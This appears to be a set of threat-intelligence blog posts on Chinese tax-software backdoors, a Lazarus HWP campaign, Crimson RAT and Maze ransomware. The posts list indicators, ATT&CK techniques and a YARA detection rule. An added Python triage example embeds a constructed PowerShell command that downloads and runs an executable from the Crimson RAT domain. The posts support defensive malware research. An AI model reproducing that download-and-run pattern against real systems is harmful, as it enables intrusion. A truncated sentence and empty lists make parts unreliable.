GoldenBall — GoldenSpy V2.0

Trustwave researchers recently identified a backdoor in the Golden Tax software "Aisino". There is another Golden Tax software, "Baiwang", which also delivers malicious payloads.

Golden Tax Invoicing System (金税开票系统)

There are two official providers of Invoicing Systems in China for the government: Aisino (航天) and Baiwang (百望). All businesses must issue VAT invoices through the Golden Tax system.

Baiwang

In Jan 2019, files uploaded to VirusTotal from China were linked to the Golden Tax invoice software Baiwang: 26e71f1d387298162c1b19e858d001a1 (wmiasssrv.dll) and 490d17a5b016f3abc14cc57f955b49b3 (msorvs571.dat).

Analysis

I tried to extract the samples and analyse them. The file doesn't execute in a sandbox environment. Below are the notable imports of the files.

Notable imports of wmiasssrv.dll
Notable imports of msorvs571.dat

Network connection:

From analysing the code, it appears that the malware generates the connecting URL at runtime and then downloads subsequent payloads from it.

A VirusTotal search for the filename "taxver.jpg" returned only one HTML file, which was downloaded from the domain help[.]tax-helper[.]ltd. So there is a high chance that this is the dynamically calculated domain.

I then pivoted on the domain in RiskIQ to check for related hashes.

RiskIQ showing relevant hashes

This resulted in 4 other hashes:

  • 0ed0ef98f8dc1b8d1b833183d39d3d8c
  • 5e378316e852bef1bdd892d39c0c1ef1
  • 590a9da3e5a67b8ca9f823f39021f5e8
  • 7a7ef986808ebb7781f5d64da9d7900c

Connecting the dots

All 4 hashes were DLL files with the same imphash, i.e. the same import table, which is what lets them be linked even though their file hashes differ. Moreover, their code genes partially match the Fireball malware.
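To make the imphash pivot above concrete, here is an added Python example (not code from the post) showing how an import hash is derived and how a set of samples clusters by it. The import tables are constructed for illustration and are not those of the Baiwang DLLs.

```python
import hashlib

# Added example, not code from the post: how an import hash (imphash)
# is derived, so DLLs built from the same code base with the same import
# table share one value even when their file hashes differ. The import
# lists below are constructed; they are not the Baiwang DLLs' tables.

def imphash(imports):
    """Imphash of an ordered list of (library, function) import pairs.

    Mirrors the widely used scheme: library name lower-cased and stripped
    of a .dll/.ocx/.sys extension, function name lower-cased, imports by
    ordinal written as "ord<N>", entries joined with commas in import-table
    order, then MD5. (Tools also resolve ordinals of a few well-known
    libraries to names; this simplified version does not.)
    """
    parts = []
    for lib, func in imports:
        lib = lib.lower()
        base, _, ext = lib.rpartition(".")
        if ext in ("dll", "ocx", "sys"):
            lib = base
        name = "ord%d" % func if isinstance(func, int) else func.lower()
        parts.append("%s.%s" % (lib, name))
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()

def cluster_by_imphash(samples):
    """Group sample names by imphash, the pivot used in the post."""
    groups = {}
    for name, imports in samples.items():
        groups.setdefault(imphash(imports), []).append(name)
    return groups

# Constructed import tables: A and B differ only in the spelling of
# library/function names (and would differ in file contents), while C
# imports the same functions in a different order.
SAMPLES = {
    "sample_A.dll": [("KERNEL32.dll", "LoadLibraryA"), ("KERNEL32.dll", "GetProcAddress"),
                     ("WININET.dll", "InternetOpenA"), ("ws2_32.dll", 23)],
    "sample_B.dll": [("kernel32.DLL", "loadlibrarya"), ("kernel32.DLL", "getprocaddress"),
                     ("wininet.DLL", "internetopena"), ("WS2_32.dll", 23)],
    "sample_C.dll": [("WININET.dll", "InternetOpenA"), ("KERNEL32.dll", "LoadLibraryA"),
                     ("KERNEL32.dll", "GetProcAddress"), ("ws2_32.dll", 23)],
}

if __name__ == "__main__":
    for h, names in cluster_by_imphash(SAMPLES).items():
        print(h, names)
```

Because import order is part of the hash, a rebuilt binary with a reordered import table lands in a different cluster, so a matching imphash is a strong but not exhaustive link.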

In June 2017, Check Point uncovered the Fireball operation, run by a Chinese digital marketing agency. The Fireball malware acts as a browser hijacker but can be turned into a fully functioning malware downloader. Fireball is capable of executing any code on the victim machines, resulting in a wide range of actions from stealing credentials to dropping additional malware.

IoCs

  • 26e71f1d387298162c1b19e858d001a1
  • 490d17a5b016f3abc14cc57f955b49b3
  • 0ed0ef98f8dc1b8d1b833183d39d3d8c
  • 5e378316e852bef1bdd892d39c0c1ef1
  • 590a9da3e5a67b8ca9f823f39021f5e8
  • 7a7ef986808ebb7781f5d64da9d7900c
  • help[.]tax-helper[.]ltd

Reference

https://www.linkedin.com/pulse/china-specific-golden-tax-%E9%87%91%E7%A8%8E-fapiao-%E5%8F%91%E7%A5%A8-samuel-rollet/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/

https://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/

Lazarus group leverages Covid themed HWP Document

Lazarus Group, a North Korean state-sponsored threat actor, serves as an umbrella for several subgroups and has conducted extensive operations since as early as 2009.

Lazarus is a financially motivated, North Korean regime-backed group responsible for conducting destructive attacks against financial institutions, as well as some of the world's largest cyber heists. Based on widely publicized operations alone, the group has attempted to steal more than $1.1 billion. Instead of simply obtaining access and moving to transfer funds as quickly as possible, Lazarus is believed to operate more like an espionage operation, carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems.

In a recent campaign, Lazarus is using Covid-themed HWP documents targeting South Korea.

One of the executables uploaded from South Korea to the VirusTotal repository matched a YARA rule for detecting a reflective loader. This sample caught my attention since it was delivered by a Covid-themed HWP document and was found to be used by the Lazarus group.

Intelligence Analysis:

Through OSINT investigation, I found that the executable is downloaded from sofa[.]rs through the HWP document 전라남도 코로나바이러스 대응 긴급 조회.hwp (translation: Urgent inquiry for Coronavirus response in Jeollanam-do). Jeollanam-do is a province of South Korea, which indicates that the most probable target is South Korea.

The code pattern has genes from various known malware families, including Petya, Trickbot and Gandcrab, and also contains genes from admin tools like TeamViewer and Dameware.

Code genes matches

Malware Analysis:

Notable features of executable: 

  • Reads Clipboard data
  • Logs Keystrokes
  • Contains killswitch to choose victims
  • Highly obfuscated file
  • Detects sandbox environment to evade detection 
  • Contains functionality for execution timing, often used to detect debuggers 
  • Contains long sleeps
  • Contains functionality to check if a debugger is running (IsDebuggerPresent)

Embedded Domains:

  • kingsvc[.]cc
  • mbrainingevents[.]com
  • afuocolento[.]it

Process flow:

Process flow

Indicators of Compromise (IoCs):

Domains:

  • sofa[.]rs
  • kingsvc[.]cc
  • mbrainingevents[.]com
  • afuocolento[.]it

Hash:

  • 8451be72b75a38516e7ba7972729909e
  • fe2d05365f059d48fd972c79afeee682
  • 186aa05bfe4739274c3c258be4a5a160

IP:

  • 185[.]62[.]56[.]131

Indicators of Attacks (IoAs):

  • Execution: T1047: Windows Management Instrumentation
  • Execution: T1106: Execution through API
  • Persistence: T1138: Application Shimming
  • Privilege Escalation: T1138: Application Shimming 
  • Defense Evasion: T1036: Masquerading 
  • Defense Evasion: T1045: Software Packing
  • Defense Evasion: T1497: Virtualization/Sandbox Evasion
  • Defense Evasion: T1140: Deobfuscate/Decode Files or Information
  • Defense Evasion: T1027: Obfuscated Files or Information
  • Credential Access: T1056: Input Capture 
  • Discovery: T1124: System Time Discovery
  • Discovery: T1497: Virtualization/Sandbox Evasion
  • Discovery: T1057: Process Discovery
  • Discovery: T1087: Account Discovery
  • Discovery: T1033: System Owner/User Discovery 
  • Discovery: T1063: Security Software Discovery
  • Discovery: T1082: System Information Discovery 
  • Lateral Movement: T1105: Remote File Copy
  • Collection: T1056: Input Capture
  • Collection: T1115: Clipboard Data
  • Exfiltration: T1022: Data Encrypted
  • Command and control: T1032: Standard Cryptographic Protocol

Yara Rule:

import "pe"

rule ReflectiveLoader {
   meta:
      description = "Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended"
      reference = "Internal Research"
      score = 60
   strings:
      $s1 = "ReflectiveLoader" fullword ascii
      $s2 = "ReflectivLoader.dll" fullword ascii
      $s3 = "?ReflectiveLoader@@" ascii
   condition:
      uint16(0) == 0x5a4d and (
            1 of them or
            pe.exports("ReflectiveLoader") or
            pe.exports("_ReflectiveLoader@4") or
            pe.exports("?ReflectiveLoader@@YGKPAX@Z")
         )
}

Reference: 

  • VirusTotal
  • Intezer Analyze™

Contact:

https://www.linkedin.com/in/dinesh135kumar/

Revive of Crimson RAT

Crimson RAT was previously used by the Pakistani threat actor Transparent Tribe.

CrowdStrike has been tracking the threat actor under the name MYTHIC LEOPARD since 2016. According to its blog, MYTHIC LEOPARD is a Pakistan-based adversary with operations likely located in Karachi. This adversary uses social engineering and spear phishing to target Indian military and defense entities with Crimson RAT. FireEye tracks a similar threat actor named APT36 (AKA Lapis), a Pakistan-based cyber espionage group that supports Pakistani military and diplomatic interests, targeting the Indian military and government with malware named SeedDoor.

Very few samples were uploaded to the public malware repositories from June 2018 to Jan 2020. From mid-January 2020, quite a few samples triggered the YARA rules created to track the operation.

Analysis:

One such sample that hit the custom YARA rule was 69d4883858b44f0c41ba68493c389885, submitted on Jan 23, 2020 from a German IP (possibly a VPN).

The file is a malicious Microsoft Excel document that leverages the CVE-2017-0199 vulnerability. This vulnerability allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a document containing an embedded exploit.

The Excel document runs a Base64-encoded PowerShell script.

The decoded PowerShell script shows the URL contacted to download and execute the second-stage payload.

The executable establishes communication through the unusual port 2987.

Process flow:

  1. The Excel file leverages the CVE-2017-0199 vulnerability to run a PowerShell script.
  2. The PowerShell script downloads an executable from newsupdates[.]myftp[.]org.
  3. The executable connects to bjorn111[.]duckdns[.]org.
  4. The threat is identified as Crimson RAT (ETPRO TROJAN MSIL/Crimson Receiving Command).
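Steps 1 and 2 of this chain leave a tell-tale artifact in process-creation logs: an Excel process spawning PowerShell with an encoded command. The Python below is an added example (not code from the post or from the sample) that decodes such a command line and pulls out the download URL the way an analyst would during triage. The command line and script are constructed; only the domain is taken from the post.

```python
import base64
import re

# Constructed sample of the shape an EDR records when Excel spawns
# PowerShell with an -EncodedCommand argument. The script is built here
# from a constructed string (it is NOT the second stage of the Crimson
# RAT sample); the domain is the one named in the post.
_SCRIPT = ("$u='http://newsupdates.myftp.org/update.exe';"
           "(New-Object Net.WebClient).DownloadFile($u,$env:TEMP+'\\a.exe');"
           "Start-Process ($env:TEMP+'\\a.exe')")
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -EncodedCommand "
                  + base64.b64encode(_SCRIPT.encode("utf-16le")).decode())

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match every "-e..." switch and keep the first argument
# that decodes as base64-wrapped UTF-16LE text.
_SWITCH = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the plaintext script behind -EncodedCommand, or None."""
    for m in _SWITCH.finditer(cmdline):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            script = raw.decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            continue          # e.g. "-ExecutionPolicy Bypass" is not base64
        if all(c.isprintable() or c in "\r\n\t" for c in script):
            return script
    return None

def extract_urls(script):
    """Pull download URLs out of a decoded script (quotes end a URL)."""
    return re.findall(r"https?://[^\s'\"()]+", script)

def defang(url):
    """Render a URL so it cannot be clicked by accident in a report."""
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]")

def triage(cmdline):
    """Decode the command line and list its URLs in defanged form."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "urls": []}
    return {"encoded": True, "urls": [defang(u) for u in extract_urls(script)]}

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

The same decoder applies to any `-e`/`-enc` variant, which is why a detection rule should key on the parent process (Excel) plus the encoded switch rather than on one spelling of it.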

IoAs:

  • Execution: T1203: Exploitation for Client Execution (CVE-2017-0199)
  • Execution: T1086: PowerShell
  • Discovery: T1012: Query Registry
  • Command and Control: T1105: Remote File Copy
  • Command and Control: T1065: Uncommonly Used Port (2987)

IoCs:

Hash

  • 6e0ba1b2e72d9a0682d1cdd27eea3980da04582bdef0080bf22f8809d172e229 (Downloader, Excel document)
  • d27474625cdc0c3456918edfa58bfaf910c8b98c6168a506ac14afc1a41fb58f (Dropped executable)

Domain

  • newsupdates[.]myftp[.]org
  • bjorn111[.]duckdns[.]org

IP

  • 108[.]62[.]12[.]134
  • 160[.]20[.]147[.]59

The return of the Crimson RAT in malware repositories might be due to some operations observed in the wild using.

Reference:

https://medium.com/@dinu135dk/revive-of-crimson-rat-6b8838920c02

Maze Ransomware Victim’s data revealed

Recently, various successful ransomware attacks have been observed, of which Maze ransomware tops the list. The threat actors behind Maze ransomware are attributed as TA2101 by Proofpoint and APT-29 by Talos Intelligence. The Maze team is publicly exposing victims by displaying real files exfiltrated from their hacked servers. The threat actors are supposed to have registered the domain mazenews[.]top to release the exfiltrated data.

Homepage of mazenews[.]top

Recent incidents:
Over the past several months, Talos Incident Response responded to several such incidents, where an adversary gained access to an environment, deployed ransomware, and exfiltrated large amounts of data, combining elements of ransomware and doxxing attacks into a single incident.

In one incident, the attacker leveraged Cobalt Strike after obtaining access to the network. Cobalt Strike is a widely used offensive security and red-teaming framework, which is also commonly used by adversaries to attack their targets. Once the adversary has access, they spend at least a week moving laterally around the network and gathering systems and data along the way. Combined with Cobalt Strike, the actor used a technique commonly associated with APT-29, leveraging a named pipe.

Victims List:

On December 11, the group behind the Maze ransomware established a website where victims who refused to pay the ransom were shamed and the information stolen from them by the group was leaked.

This trend of squeezing maximum monetary gain out of their nefarious activities is increasingly common in the crimeware space, as demonstrated by the proliferation of Emotet and the millions and millions of dollars in damage that have followed. Expect adversaries to be increasingly aware of the systems and networks they are compromising, as not all systems and networks are created equal and some have much higher profit margins when compromised.

Indicators of Compromise (IoCs):
HASHES:

CobaltStrike

  • 51461b83f3b8afbcae46145be60f7ff11b5609f1a2341283ad49c03121e6cafe
  • 3627eb2e1940e50ab2e7b3ee703bc5f8663233fe71a872b32178cb118fb3e2d9

Maze Ransomware


IP ADDRESSES:

  • 91.218.114[.]4
  • 5.199.167[.]188
  • 185.147.15[.]22

References:

Contact: https://www.linkedin.com/in/dinesh135kumar/
